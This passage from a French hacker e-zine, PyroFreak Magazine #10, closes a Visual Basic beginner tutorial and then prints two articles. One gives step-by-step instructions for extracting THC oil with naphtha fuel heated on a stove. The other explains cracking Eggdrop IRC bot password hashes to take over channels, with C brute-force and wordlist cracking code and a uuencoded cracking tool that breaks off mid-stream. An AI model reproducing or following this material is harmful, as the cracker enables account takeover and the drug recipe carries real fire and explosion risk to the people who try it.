lui, fait la même chose qu'à l'exercice précédant. ________ Notions: (La Variable) ¯¯¯¯¯¯¯¯ Une variable est un endroit où l'on peut stoquer des information, elle est idéale pour stoker des information temporairement, c'est un peut comme si vous aviez une Étiquette Invisible. ____________ Exercice 1.3 (Propriétés, textes et Caption) ¯¯¯¯¯¯¯¯¯¯¯¯ - Prenez l'exercice N°2 - Faites Affiché la fenêtre de codage - Allez completement en haut [(Generals), (Declaration)] - Inscrivez y: Dim Va_Copy - Remplacez le codage de Bo_Copy ppar le suivant: Private Sub Bo_Copy_Click() Va_Copy = Zt_Enter.Text Et_Destination.Caption = Va_Copy End Sub Le programme fait exactement la même chose qu'avant, mais il ne fonctionne pas de la même fasson, Au lieu de mettre directement la valeur de Zt_Enter.Text dans Et_Destination.Caption, il met dabord la valeur dans la variable Va_Copy puis va chercher le contenue de celle-ci dans Et_Destination.Caption. ________ Notions: (Modifier une Variable) ¯¯¯¯¯¯¯¯ Modifier une donnée en la fesant passé par une variable est beaucoup plus simple que de la modifier directement. Fonction Val(String): La fonction Val sert à transformé une valeur en donné numérique. Fonction Str(number): La fonction Str sert à transformé une valeur en donné texte(String) N.B. "123" est une donné string 123 quand à lui, est une donné numérique on peut passé d'un a lautre à l'aide de Val et Str. ____________ Exercice 1.4 (Fonction Val, Modifier une variable) ¯¯¯¯¯¯¯¯¯¯¯¯ - Prenez l'exercice N°3 - Modifier le codage de Bo_Copy par: Private Sub Bo_Copy_Click() Va_Copy = Val(Zt_Enter.Text) Va_Copy = Va_Copy + 5 Et_Destination.Caption = Va_Copy End Sub Maintenant, executez le programme(F5), Entrez un nombre dans Zt_Enter et appuyez sur le bouton Copy. Vous remarquerez que la valeur que vous avez entré dans Zt_Enter à été additionné de 5 puis appliquer à Et_Destination. ________ Notions: (Calcules Mathématique) ¯¯¯¯¯¯¯¯ Vous pouvez faire une multitude de calcule mathématique avec Visual Basic. Voici comment: Pour faire: Codage: ¯¯¯¯¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯ 5 + 2 5+2 5 - 2 5-2 5 ÷ 2 5/2 5 × 2 5*2 5² 5^2 5³ + 7² ------- (5^3+7^2)/5^2 5² ___ V 9 9^(1/2) ____________ Exercice 1.5 (Calcule Mathématique) ¯¯¯¯¯¯¯¯¯¯¯¯ Dans cet exercice, nous allon prendre l'exercice N°4 et remplacé la ligne « Va_Copy = Va_Copy + 5 » de Bo_Copy par les suivantes à tour de rôle pour obtenir les résultats voulus. - Variable + 4 Va_Copy = Va_Copy + 4 ____ - V 25 - Variable Va_Copy = 25^(1/2) - Va_Copy - 177 ÷ 33 + Variable + 2 Va_Copy = (177/33) + Va_Copy + 2 - 3² + 1 × Variable Va_Copy = 3^2+1 * Va_Copy - Varioable à la puissance 19 Va_Copy = Va_Copy ^19 Exécutez le programme et entrez un chiffre dans Zt_Enter. Si vous vérifiez avec une calculatrice, vous remarquerez que tout s'est bien produit dans l'ordre. ____________ Exercice 1.6 (Création d'une calculatrice) ¯¯¯¯¯¯¯¯¯¯¯¯ - Affichez un nouveau projet VB à l'écran - créez les objets suivant comme le présente l'image exercice1_6.jpg : Boutons: Name: Caption: ¯¯¯¯¯ ¯¯¯¯¯¯¯¯ Bo_Quit Quitter Bo_Raz RAZ Bo_Plus + Bo_Moin - Bo_Multi x Bo_Divi / Zone de Texte: Names: Text: ¯¯¯¯¯¯ ¯¯¯¯¯ Zt_Enter1 'Rien' Zt_Enter2 'Rien' Zt_Reponse 'Rien' - Donnez le nom F_Main et le caption Calculatrice à votre feuille de travail. - Entrez la fonction End dans le Bo_Quit comme d'habitude. - Entrez dans le Bo_Raz le codage suivant: Private Sub Bo_Raz_Click() Zt_Enter1.Text = "" Zt_Enter2.Text = "" Zt_Reponse.Caption = "" End Sub - Entrez dans le Bo_Plus le codage suivant: Private Sub Bo_Plus_Click() Va_Val1 = Val(Zt_Entrer1.Text) Va_Val2 = Val(Zt_Entrer2.Text) Et_Reponse.Caption = Va_Val1 + Va_Val2 End Sub - Entrez dans le Bo_Moin le codage suivant: Private Sub Bo_Moin_Click() Va_Val1 = Val(Zt_Entrer1.Text) Va_Val2 = Val(Zt_Entrer2.Text) Et_Reponse.Caption = Va_Val1 - Va_Val2 End Sub - Entrez dans le Bo_Multi le codage suivant: Private Sub Bo_Multi_Click() Va_Val1 = Val(Zt_Entrer1.Text) Va_Val2 = Val(Zt_Entrer2.Text) Et_Reponse.Caption = Va_Val1 * Va_Val2 End Sub - Entrez dans le Bo_Divi le codage suivant: Private Sub Bo_Divi_Click() Va_Val1 = Val(Zt_Entrer1.Text) Va_Val2 = Val(Zt_Entrer2.Text) Et_Reponse.Caption = Va_Val1 / Va_Val2 End Sub - Allez définir les Variables Va_Val1 et Va_Val2 à l'aide de la commande DIM: Dim Va_Val1, Va_Val2 Exécutez le programme puis entrez deux nombre dans chacun des textbox puis cliquez sur le bouton représentant l'opération que vous voulez leur faire effectués. ________ Notions: (MsgBox) ¯¯¯¯¯¯¯¯ Vous pouvez faire affiché un message à l'utilisateur par le biait de la fonction MsgBox. Voici la syntaxe de la fonction MsgBox: MsgBox (Message [,Boutons] [,titre] [, Fichier d'aide, Numéro de Contexte] ) Message: ¯¯¯¯¯¯¯¯ Expression de Chaîne(String) affichée comme message dans la boîte de dialogue. La longeur maximale de l'argument message est d'environ 1 024 caractères (1 Ko) selon la largeur des caractères utilisés. Si l'argument message occupe plus d'une ligne, n'oubliez pas d'insérer un retour de chariot (Chr(13)) ou un saut de ligne (Chr(10)) entre les lignes, ou une combinaison de caractères retour chariot-saut de ligne (Chr(13) & Chr(10)). Boutons: ¯¯¯¯¯¯¯¯ Facultatif. Expression numérique qui représente la somme des valeurs indiquand le nombre et le type de boutons à afficher, le style d'icône à utiliser, l'identité du bouton par défaut, ainsi que la modalité du message. Si l'argument bouton est omnis, sa baleur par défaut est 0. Constante Valeur Desctiption ¯¯¯¯¯¯¯¯¯ ¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯ vbOKOnly 0 Affiche le bouton OK uniquement. vbOKCancel 1 Affiche les boutons OK et Annuler. vbAbordRetryIgnore 2 Affiche le bouton Abandoner, Réessayer et Ignorer vbYesNoCancel 3 Affiche les boutons Oui, Non et Annuler vbYesNo 4 Affiche les boutons Oui et Non vbRetryCancel 5 Affiche les boutons Réessayer et Annuler vbCritical 16 Affiche l'icône Message critique vbQuestion 32 Affiche l'icône Requête d'avertissement vbInformation 64 Affiche l'icône Message d'Avertissement vbDefaultButton1 0 Le premier bouton est le bouton par défaut vbDefaultButton2 256 Le deuxième bouton est le bouton par défaut vbDefaultButton3 512 Le troisième bouton est le bouton par défaut vbDefaultButton4 768 Le quatrième bouton est le bouton par défaut vbApplicationModal 0 Boîte de dialogue modale. L'utilisateur doit répondre au message affiché dans la zone de message avant de pouvoir continuer de travailler dans l'aplication en cours. vbSystemModal 4096 Modal système. Toutes les applications sont interrompues jusqu'à ce que l'utilisateur réponde au message affiché dans la zone de message. Le premier groupe de valeurs (0 à 5) décrit le nombre et le type de boutons affichés dans la boîte de dialogue. Le deuxième groupe (16, 32, 48 et 64) décrit le style d'icône. Le troisième groupe (0, 256, 512 et 768) définit le bouton par défaut. Enfin, le quatrième groupe (0 et 4096) détermine la modalité de la zone de message. Au moment d'additionner ces nombres pour obtenir la valeur finale de l'argument Bouton, ne sélectionnez qu'un seul nombre dans chaque groupe. Titre: ¯¯¯¯¯¯ Facultatif. Expression de chaîne affichée dans la barre de titre de la boîte de dialogue. Si l'argument title est omnis, le nom de l'application est placé dans la barre de titre. Fichier d'aide: ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Facultatif. Expression de Chaîne indiquand le fichier d'aide à utiliser pour fournis une aide contextuelle sur la boîte de dialogue. Si l'argument Fichier d'Aide est défini, l'argument Numéro de Contexte doit l'être également. Numéro de Contexte: ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Facultatif. Expression indiquand le numéro de contexte attribué par l'auteur de l'aide à la rubrique appropriée. Si l'argument Numéro de Contexte est défini, l'argument fichier d'aide doit l'être également. Valeur Renvoyé: ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Constante Valeur Boutton ¯¯¯¯¯¯¯¯¯ ¯¯¯¯¯¯ ¯¯¯¯¯¯¯ vbOK 1 OK vbCancel 2 Annuler vbAbort 3 Abandonner vbRetry 4 Réessayer vbIgnore 5 Ignorer vbYes 6 Oui vbNo 7 Non Si vous indiqurez à VB d'Affiché des boutons particulier, MsgBox retournera un chiffre indiquand quel a été le bouton activé. Dans ce cas, vous devez pécifier une destination au données, comme suis: Dim X X = MsgBox ("Voulez-vous poursuivre ?" , 4 , "Erreur..") ____________ Exercice 1.7 (MsgBox) ¯¯¯¯¯¯¯¯¯¯¯¯ - Affichez un nouveau projet VB à l'écran - Placez un bouton que vous nommerez Bo_Msg au centre de la Feuille et insérez y le codage suivant: Private Sub Bo_Msg_Click() MsgBox "Voici un Message-Box", "Pyrofreak Tutorial" End Sub Executez le programme et cliquez sur le bouton. Vous pouvez remarquer que VB Affiche une petite fenêtre avec le message "Voici un Message-Box" portant le titre "Pyrofreak Tutorial" et affichang le bouton OK. ____________ Exercice 1.8 (MsgBox) ¯¯¯¯¯¯¯¯¯¯¯¯ - Prenez l'exercice du N°7 et ajoutez-y les objects suivants: Zone de Texte: Names: Text: ¯¯¯¯¯¯ ¯¯¯¯¯ Zt_msg 'Rien' Zt_titre 'Rien' - Changez le codage du bouton pour le suivant: Private Sub Bo_Msg_Click() MsgBox Zt_msg.Text, Zt_titre.Text End Sub Exécutez le programme, entrez du texte dans Zt_msg et Zt_Titre puis appuyez sur le bouton. VB affichera le contenue de Zt_msg comme message et celui de Zt_titre comme titre de la fenêtre. fait la même chose qu'à l'exercice précédant. ________ Notions: (Print) ¯¯¯¯¯¯¯¯ La fonction print, affiche du texte sur la feuille, sans Éttiquettes ou rien. Elle rapporte a celle de Q-Basic qui servait a écrire du texte. Syntaxe: Print Texte ________ Notions: (Cls) ¯¯¯¯¯¯¯¯ La fonction Cls sert a effacé le texte affiché à l'aide de la fonction Print. syntaxe: Cls ____________ Exercice 1.8 (Print) - Ouvrez un nouveau projet VB et placez y les object suivants: Boutons: Name: Caption: ¯¯¯¯¯ ¯¯¯¯¯¯¯¯ Bo_Go Go Bo_Raz RAZ Bo_Quit Quitter Ettiquettes: Names: Caption: ¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯ Et_1 Titre Et_2 Message Et_1 Titre Zone de Texte: Names: Text: ¯¯¯¯¯¯ ¯¯¯¯¯ Zt_msg 'Rien' Zt_Titre 'Rien' - Entrez dans chacun des bouton le codage suivants: Private Sub Bo_Go_Click() Dim X X = MsgBox Zt_msg.Text, 4, Zt_titre.Text cls Print "No correspondant à la réponse: " & X End Sub Private Sub Bo_Raz_Click() Cls Zt_msg.text = "" Zt_Titre.text = "" End Sub Private Sub Bo_Quit_Click() End End Sub - Disposez le tout comme suggéré dans exercice1_8.jpg Exécutez le programme puis Entrez une question et un Titre et appuyez sur GO. Bon.. C'est tout pour la première partie.. je vous reviendrai dans le prochain numéro de Pyrofreak avec une suite. D'ici la.. Bonne chance.. Mes P'ti MaDz Pr0Gr4MerZz!! - Vip0|a ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10 | 10-Fabrication d'huile de THC |( ) Phreak ( ) Hack (X) Autres '.__________Par Neuro________ ________ neuro@pyrofreak.org ______ ___ Salut tous, tout récemment, j'ai tester une méthode pour faire de l'huile, qui à ma grandre surprise a été d'une "méga" simplicité et qui à été très éfficace sur mon cerveau. C'est pourquoi j'ai décidé de vous la communiquer. | |.| |.| |\./| |\./| . |\./| . \^.\ |\\.//| /.^/ \--.|\ |\\.//| /|.--/ \--.| \ |\\.//| / |.--/ \---.|\ |\./| /|.---/ \--.|\ |\./| /|.--/ \ .\ |.| /. / _ -_^_^_^_- \ \\ // / -_^_^_^_- _ - -/_/_/- ^ ^ | ^ ^ -\_\_\- - | **Matériaux Nécessaires** -Filtre à café -Canne de conserve vide sans le papier a l'entour OU un chaudron, mais dite vous que celui-ci ne sera plus bon par la suite. (La Grosseurs dépend du nombre de grammes de marijuana que vous voulez transformer en huile) -Gaz à fondu (Naftam avec anti-rouille) (Gaz de couleur bleu qui se vend dans toute les épiceries) -Votre feuille ou trime de marijuana -Un bol plus ou égal grandeur que la canne de conserve -Un baton rond soit en bois ou en métal pour écraser et mélanger la marijuana -Un rond de poil -Un Ouvre boite -Un Exacto de préférence ou sinon un couteau fera l'affaire **Les mises en garde** ATTENTION: Le gaz à fondu est explosif et très flammable, donc faîte très attention, et essayer d'avoir une porte de sortie près de votre rond de poil, pour en cas de feu, pouvoir jeter votre mélange en dehors de la maison. Un Extincteur a porter de la main serait à vous conseiller. On ne sait jamais cé quoi qui peut arriver. Je vous conseille aussi de faire cela dans un endroit bien aéré. Je vous donne un exemple, c'est ma méthode, j'ouvre la fenêtre à coter du poil, je laisse la porte entre-ouverte, pour que l'air circule, et aussi pour quand qu'a de feu, je peuve l'ouvrir facilement et rapidement, et j'ouvre la "fan" de mon poil pas trop forte, de façon à bien entendre si le mélange vient à faire de grosses bulles ou un sifflement. **Les parties** D'après mon expérience personnel, qui n'est pas encore dévellopé au maximum, il faut 1 bouteille de 500 ml de gaz à fondu pour 85 grammes de feuille ou de trime de marijuana. Mais je vais vous donner un truc très simple pour savoir comment qui vous faut de gaz selon la feuille que vous avez. Mettez votre feuille dans votre bol, et verser du gaz, jusqu'a temps que la marijuana soit recouverte au complet. Aussi simple que cela. **Extraire le THC** Après avoir mélangé votre pot et le gaz dans le bol, vous prenez votre baton et vous brasser le mélange, le remuer, l'écraser, le tourner. Le liquide va virer à une couleur verdâtre bien assez vite. Ensuite laisser reposer le mélange durant quelques heures (6-8), le temps que le THC s'extrait bien de la marijuana. 6 heures est un minimum, vous pouvez le laisser beau- coup plus longtemps pour une meilleur efficicacité. **Filtrage** Vous mettez votre filtre à café par dessus votre canne de conserve, vous verser votre solution, qui devrais etre d'un vert très foncé, si vous avez pas trop mis de gaz. Quand le liquide à fini de couler, verser maintenant la marijuana aussi dans le filtre, et excerser une pression sur le filtre avec vos mains, pour bien extraire le plus possible le THC du pot. Ensuite jeter la marijuana, elle est rendu infumable, bref cela est mon avis, mais si ca vous dis de fumer de la marijuana explosif qui buzz pas, faite cela à votre tête. Laver vous bien les mains par la suite, le gaz rentre dans peau. **Cuisson** Metter votre canne de conserve sur le rond, et faite chauffer celui-ci au minimum (Entre le récheau et le niveau 2, (cela est basé d'apres mon poil et une petite quantité de feuilles)). Tester le vous même vous allez savoir à quel température faut ajuster votre rond. Faut que le mélange fasse de tres petites bulles, sans faire de sifflement. ATTENTION: Si le mélange fais de grosses bulles, ou/et un sifflement très intense, baisser la chaleur de votre rond immédiatement. Bon, maintenant que quasi tout le gaz à fondu soit évaporer, ils vous reste 2 étapes avant l'étape ultime qui est de tester votre "Stock". Si vous avez pris une canne de conserve, j'ai un truc pour vous, qui va vous faire économiser du temps, et aussi beaucoup de patience. Couper le fond de la canne en question avec un ouvre boite. 90% de votre huile se retrouve justement sur ce fond de canne. Ensuite avec un exacto, il ne reste plus qu'a gratter le fond de la canne le plus possible, et déposer au fur à mesure l'huile sur une surface plate et lisse. Par la suite, reprener petit par petit votre huile (A coup de .3 gram environ), avec votre exacto, de facon a faire seulement une boule. Vous prener un lighter et vous allumer votre bite. Une flamme d'environ 5 secondes va se produire quand vous allumiez votre produit, et l'huile va retomber de lexacto par elle meme. Cé pour éliminer le plus possible le restant de gaz restant dans l'huile. Si l'huile devient toute sec après cet opération, c'est peut-être à cause qui reste encore trop de gaz dans votre huile. Bon, et maintenant avec l'huile obtenu, vous pouvez tripper au max, et cela ne vous aura pas couter trop cher. Si vous voyez quel goûte encore trop le gaz a fondu, recommencer la dernière opération. **Moyen pour peser votre huile** Beaucoup de monde trouvent que peser l'huile peut s'avérer d'une difficulté extreme, heh bien, j'ai la solution à votre problème. Prener votre balance habituelle, peser-y un bouchon de biere, et inscriver bien son poid. Ensuite vider directement l'huile dans le bouchon de biere et cela sur la balance. Avec cela vous pouvez savoir exactement quand vous aller avoir atteint la quantité désiré, sans faire de dégat, et je trouve ca pratique dans un bouchon de bière. Nb de Neuro: Une version de cet article plus détaillé est prévu dans les prochaines semaines, elle sera disponible sur le site web de PyroFreak (Www.PyroFreak.Org) dans les textes Onlines. ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10 |11-Les secrets d'Eggdrop enfin dévoilés |( ) Phreak (X) Hack ( ) Autres '.__________Par LeMarquis________ ________ lemarquiz@yahoo.com ______ ___ Eggdrop est un programme très populaire sur le net. Il permet de configurer un bot sur un serveur unix. Le bot doit faire l'authentification de chaque OP du channel pour les oper. Il doit donc mémoriser chaque utilisateurs et leur password correspondant. L'ensemble de cette information est enregistrée dans son fichier de configuration: eggdrop.conf. Ce fichier est accessible sur le serveur qui runne le eggdrop. Qui n'a jamais vu sur un quelconque serveur unix un eggdrop en activité?. Si l'on arrive à lire son fichier de configuration, nous pourrions décrypter les password et avoir du plaisir sur leur channel irc. Exemple de eggdrop.conf: [..] Franck - - ! #pyrofreak 0 fmnov --HOSTS *!lemarquis@*.sprint.ca --PASS +kxW5Q0AvijV1 --XTRA created 936417875 --COMMENT user très cool [...] Nous avons ici le hostname mask du user. Nous devons l'avoir pour que le bot nous accepte. Ensuite on retrouve le password encrypter "+kxW5Q0AvijV1". Ce password est encrypter en blowfish. Tout comme le DES nous ne pouvons pas reverser l'encryption et obtenir le password en refaisant l'algorithme à l'envers. Mais nous pouvons a l'image de john de ripper, faire un programme qui à l'aide d'une liste de mots (wordlist) encrypterait chaque mots et les comparerait avec le password encrypter que nous tentons de découvrir. Ce type de décryption est pratique pour les passwords simples. Par contre, la tâche est longue et ardue pour des password de fortes complexités. Comme le cracking du DES, ce type d'attaque requière beaucoup de cpu power. Le blowfish utilisé dans eggdrop a un grosseur de key d'encryption pouvant aller jusqu'à 448 bits. Ce type d'encryption est sans copyright et est perçu comme secure. Son prédécesseur le DES qui a une key de 56-bit que l'on sait très vulnérable à la brute force. Avec des hardware spéciaux la NSA serait probablement capable de faire le tour de toutes les possibilités de password en 3 heures. Le brute force cracking du Blowfish demande donc beaucoup plus de temps et de cpu power que le DES. Dernièrement, j'ai vu dans les nouveautés de sécurité un programme de Hydrogen et X Organisation qui était un rip du code blowfish de eggdrop qui encryptait chaque mots d'une liste. Nous devions faire un grep avec le password que l'on voulait deviner sur la wordlist encryptée. J'ai tout de suite imaginer le potentiel de ce programme encore embryonnaire et peu rapide. Avec les procédures d'encryption de leur programme j'ai tenté de créer un programme semblable a John the Ripper. J'ai ainsi incorporer une brute force attaque ne requérant aucun wordlist. Code principal: [..] if(mode==1){ /* wordlist cracking */ if(inputfile==0) help(argv[0]); dict = (argc > 1) ? fopen(inputfile, "r") : stdin; printf("Guessing %s with wordlist %s\n\n",check,inputfile); while(!feof(dict)){ /* pour chaque word de la wordlist..*/ fscanf(dict, "%s", plain); blowfish_encrypt_pass(plain, crypted, 0); /* encrypter le word */ if(view) fprintf(stdout, "%s<->%s<->%s\n",plain,crypted,check); i++; if(!strcmp(crypted,check)) result; /* vérification si c'est le bon pass */ memset(&crypted, 0, sizeof(crypted));} printf("done. tryed %d guess\n", i);} if(mode==2){ /* brute force cracking */ [..] printf ("5 Characters Long..\n"); plain[5] = '\0'; for (i = nb1; i < nb2; i++){ /* pour chaque lettre j'incremine dans le ANSI */ for (j = nb1; j < nb2; j++){ for (k = nb1; k < nb2; k++){ for (l = nb1; l < nb2; l++){ for (m = nb1; m < nb2; m++){ plain[0] = i; plain[1] = j; plain[2] = k; plain[3] = l; plain[4] = m; blowfish_encrypt_pass(plain, crypted, 0); if(view) fprintf(stdout, "%s<->%s<->%s\n",plain,crypted,check); if(!strcmp(crypted,check)) result;}}}}} Les variable nb1 et nb2 représentent l'étendu du ANSI dans lequel nous créeons nos mots. Pour nb1=33 et nb2=126, nous essayerons toute les possibilité de mots comprenant tous les caractère possible (^*&!%AsDsa231). Pour un password de 5 caractères cela nous fait 5^57 (nb2-nb1=57) possibilité de password. Faire l'ensemble de ces password et les comparer au password à trouver serait terriblement long. C'est pourquoi, j'ai mis 4 types de brute force sur mon programme. Avec le mode numérique nous pouvons facilement deviner un password composer uniquement de chiffre. Avec 4 caractère nous avons 5^9 possibilités de password, nous venons d'économiser des heures de cracking. nb1=65 ---> nb2=122 : caractère alphabétique (A-Z,a-z) nb1=48 ---> nb2=57 : caractère numérique (0-9) nb1=48 ---> nb2=122 : caractère alphanumérique (A-Z,a-z,0-9) nb1=33 ---> nb2=126 : toute les possibilités de caractère (^*&!%AsDsa231) Lorsque que l'on interrompt notre session de cracking, le programme nous donne les chiffres représentants où le cracking s'est rendu. Ce sont les variables i,j,k,l,m,n. Elles représentent chaque caractères du dernier password testé. Plus le chiffre est haut, plus notre cracking était avancé. Le chiffre ne représente pas directement le nombre d'essai car une attaque du ANSI 48 au 57 ne donnera que des valeur entre 48 et 57. Exemple: Dernier password testé: 1338 Stoped at: 0 0 0 48 51 51 49 o --> caractère 7 = 0 n --> caractère 6 = 0 m --> caractère 5 = 0 l --> caractère 4 = 48 ==> 1 k --> caractère 3 = 51 ==> 3 j --> caractère 2 = 51 ==> 3 i --> caractère 1 = 49 ==> 8 Avec c'est 7 valeurs nous pourrions résumer notre ancienne session de crack. Il nous s'agirait de mettre ces valeurs dans un fichier ( restore pour john the ripper ) quand nous arrêtons le crackage. Une option de restauration pourrait permettre de lire ce fichier et de repartir le cracking avec ces valeurs. Je n'ai pas incorporé cette option dans mon présent programme. Toutefois quelqu'un avec un peu de connaissance en C pourrait mettre les valeurs de son ancienne session au variable du le code. En recompilant le programme, il commencera sa brute force avec les nouvelles valeurs. Ce programme est la preuve que n'importe quel type d'encryption aussi secure qu'il prétend être ne pourra être battu par une attaque bien conçu. " La connaissance est le pouvoir ", je ne peux m'empêcher d'ajouter que " le coding est le pouvoir absolu ". begin 644 eggcrack.tgz M'XL(`-PN-C@``^U\:Y<4Q[6EOZI_11J/I&[1H'A')FUT%Y*0S#4&C9#&\I4Q M$T^ZH+JJ;W6U`,UB?OOLB!-150T-LN^R)-]9U+)%=68\SV.??4YDI9\OG^79 MV?'UX]_\;!_.F%%J^,TP<*M9^7?@]'?]",75,!AKC>926X.[N,U^,["?;TG; MS_G9VJV&X3=^N7C\]G9I=?9++.B7_7S\T7"RC+,\2W'@TY/S^60&_V)8+7UZ M,5R[-F#;9X,[7R_#^]TL+V+*PZ,_//KT[OT_?W'G MP1_V?H<+LT6Z<`T-%V%^'M/P^[-UG,_\]>-/=JZ=+V:X?/':>G:2ZI4VW)]N M???'VW_Y]"_?W'XP:#-L/EB^4N/@9^NSNJ+6W.=']X;=#S>;>XOE[=5J]Q[; MW/K\UC>W;G_]]?VO-_>N\0*#AV*VV M;?Y\_^O/'W'S2INSX^5JO1UI<>+F\V78?WXP+!ZU[_CC\-&C+^[.O!,+]]^YOEL+KSU9"_OG\RI,>/XVIY>OVX"*2T^>+;S_XX M?/.'V\.M;[^Y_]G]>U\,-SZO]_J<#^[\Q^W[7SRZ<^^;0;UZ\>[]>U_B:M%A MWFEX\R9:#L.%K4GQRM9FB_7>[]+\+)6FV^YER+^K_QPN65JE!0P4(]5_RH[" M\7)YE@8'2UVG8;F*:37DY6IXL3Q?#9!Y?.96B;8XR\5"R_@/'GUZY\O;]SZ_ M<^M>&>/6IY]]/ER#Y3RNX[L%_CA9KI>KY=R5KK#*Y6)PSS#Z\'_VAHMK+%>/ MRL5=O=?%?*\>EAMGZ]5Y6->.%P526[$;X]'E=_@;[X@WWI%TY^7P[&COY5&3 M4W6-5[;=);)X@T@^_^S36Y#"?+9>S]-6*I@GS7]ND!LNX-%)J4^,_T_I=_/\E/I]]]M[- MX7$(>Y]]._NYN_YWOU/__WV9]\\&&X.OM/%Y=X>@M.- MS842=L+*A:=[>_W2]N;UL/UZ7(+SVH$#[+WW/_8_^^Q@P'_K7`?#M9UV82_, MDUOS<)$?S!:S-6;ZZOO*S:\.XB'@I)`!]EPHF8T; MQT-\'[63;(RR?.>23Z,3J7QGTC(KE3JL/9QBDQR%*'?$-&7)(ZNM1I&RF^I( M*:ADPCA1#Z7%*'@RY8X<(X*-M>6[3UH9$W*]KM+$@@G4(S`7Q.1KJS#9H%F, MM54>5=1>U]Y:639Q2STFP4W4<:K[F.R4/?>'A7^\11X/P(Z^%]IT:9!$(K;. MO*NKG<:8O7:A[C7G:$7TY3OVX'"GS>W'Q%U.=87&"6/35'M[9\/$5%UMYB+8 M/#6)".7X-"F2@IPXA&!)AHQGD01I8TPY<$,]C#238+%*UW)M(=^Z5Z?TF).K M.LMJDC+:1#U8G-!LK-*U8DS>Z-9[]"'2=ZA%*Y=:#PN1.L7K/H+03D\DZ2E( M%K6L\PF7A8$&FYYTY)Z).KL8#1MUKK80,(R=>)W#C]%+;(5ZC,E.,?C:RC#I M^,BJC9DP)9;&*EW/>!J=;*N*9;LV\'HG2JZ\J+*R(Y:2HRO?M39,!\.H1S): M"YWKJIS3VOE)U580QS2:*ETCTU@J'=1#Z^#D9!SMT'D8`&E0A:"#K+TY5UA6 M:*MR$-QH'$DW6)&F29(V4T)#3G.8[(-P3>?>34'K*EVK^"AYKG.$A!D2)WOS MHYTD[W/D:+R3DN0C5,BZ6J)U4F@Y)1/YH)*P_-8#!I9&PZNO*6TR@*S.8>.H'`SED+2, M??NV\\1,MCHV!`]<`*MK;V"44E/5OS8`$N<:EJ@4)?ZH.P?OS]:RNBH.(XG9 MUNL*\`O'CLVN;&0`/T78QQP7JLX7/0/X4,3`5#RPR3?TL5I:$0B/&8S*VVI] M0D<%!!B;GD8$L&:[2>:DL>8J46,G%63M,5D38`Y5ADP%\!G?/"K`6E4F3T50 MRH8%\G-XU)1"W0>'N0EEN@9'-,_D$Q(12DM"."AY\B)YDJX6*9B&5R;FH#G/ MY)V235I4_8<`^-"JSNL&!'/>#UMN&'E-QZLAB9&(MY;%@R05/:>D\QP^0Q.$9[&JTVQ#YB MAM-,?><1CNI&0DXQPMLR^02PRDI!.Q^#RI!0U_FD$3$HXG@/OQMI[8`/2(%P M#+#).-"`>G``@(R$HM@'H-K7[]!D\)K\7\3(H]1M59/3,L&NR78+0!I-&AR3 MFGSM`0CV("8]1O$8LZ#HY53P-C6<%]".5)PB0U(!/M)Q5[#@J(<$XL,5"%$9 M^$8BS0J?8:N^,;5)1Q^=JCMTH%<3;^S,N8@X3#'*3S+JOO/(QA0;G\-FK=") MD97(`"EF^F[UI#KW&3.\&&NNLA)<"&^JY8_X^)%7'YR*RAEOW$YE%W4B/1O` M<9"\RB?RD#.GZ..E&^'=#7T$XKP0C4V`)7!+_#$YJT6DG8]`*U@U;[+"CD(@ M+X+&,NA2[Z.4Q*=D7GE1I5IMQD4$(A#+",$!?63I`7$/\;6`\"> M0?9,0SAP%$9L"9YE05.J/F!47/7HG(R#2Y-E6%L\9:256``)W(I\$XZN0T.? M!*:&J$%1']1BG$ANT8!B>,)=EWBRL+*&NTQHED35.2(!]U*390@S,D:>!H\; M$W.YDX'2&HC,LDCE%:)8$SW2^*G-I!!'P+D: MUX@F.4,XIR9G$;)>L*#F[6<&":'+>YL06#E(UP+@C/ M)U#:9O.3-$PXLF"L0R%+JSMC>@)JU;E3X;8;]BZS5M-(7$Q[L(I(]F\`N4F1 M)T(LT%LTG3-%@>!&'@[6*AEYAHH"](VRR`PKUS&T5:D0X5?D2R.2PH0MUCF0 MIJ:)8@+0(8%V]MP(-F>\;#S`.R1:=1\2R28?R7>--]!`1Q0SVBSU2/P"1I$$ MS><1B+4DST>NP4"^.A=/S(Z*L,WFF%S2+>+:J%0*S>I,%KXAO$<^%)VTM$., M%5BD[SSP3(R"@0ICXP4\IQXL@90)@T;P$",ME MG@C;W(2LEG2@I`!0428'+((8V\XE%IXT(:"T`3$KDF6`A%I#N1&HK8S1M9W# M5Y7ABN2>P84DY7A0`,R-6"^,7_/4O3V!+(1(W@!67<1+N@%A\IX\!E:5/)A$ MY[#(OY!75LM`'N$G1EE/1K(0&>7#<'R&L-MP+I1X-%4;%6I"2DGQ6H,:>4:L M%_0@CU-'QIC@1I8P`8N3;.3$(B2<-U%LBP$!!2E[YV5<6$$]1#+>T)L1UP5KRAS3H;J+)/-(#JY98+>^4R\G">N):"_Q1V3I-*6 M<`D4"&A?YQL-@U$39];`*E#8AJ)%WZ!&Q-@*D3H[ M+Q3&D0:1L@LOB?M/$A&`>`Z?`MA^KX%H(23@BSBLY9(+BE28-A8ADD1"*4+T M:"`]U#P1DAGKPSA210-A`?D?12T^@J2)AE=!2M#@1!&W9%..(H/1>@1=H^^C M\]/(NB6F@'RC93?@DY.6+(MMY0-@[GM88W;0+S@5H!_.40-VJT!\E$UCB$5RXFXC7,,B6]G6<`Q4"Y"!A6`^8)RKJ@G M,&M&V8D':4Y<;?81$$"JE1AFA`BDFRDXK_'_*A&1Y:BZ)1J@%4^N:3['N/""L(9#V&JC7BGFJ'2!_ MRHX1HDXZ@VE8JK,A1X.DFP8SPL38HC,:0)W$K#E/<9*:5FL,<'-LN,L2HN!( M43_89'AN,=S$%!NWL:,&0'9FK6W6I791Q_("^&CJ/B8_RB")<0`D0$.G9HD! MB2ASE(V#X26$5\HI MU;-"'56!N+J/-!I5$K"J?\&9CHV]P[-+)M"KV"FEYD5..N=\:AALD&]2;IQ= M\`H1K^W#@M4KJDFE;*!;W_Q#9>F)68,@Q#)EBS@@J%`59310OXJ!>)!2'A26 MXCP:&=&M)&0#K,Z"/&>,PE#C[FQ)>X_4H.XPS.I723 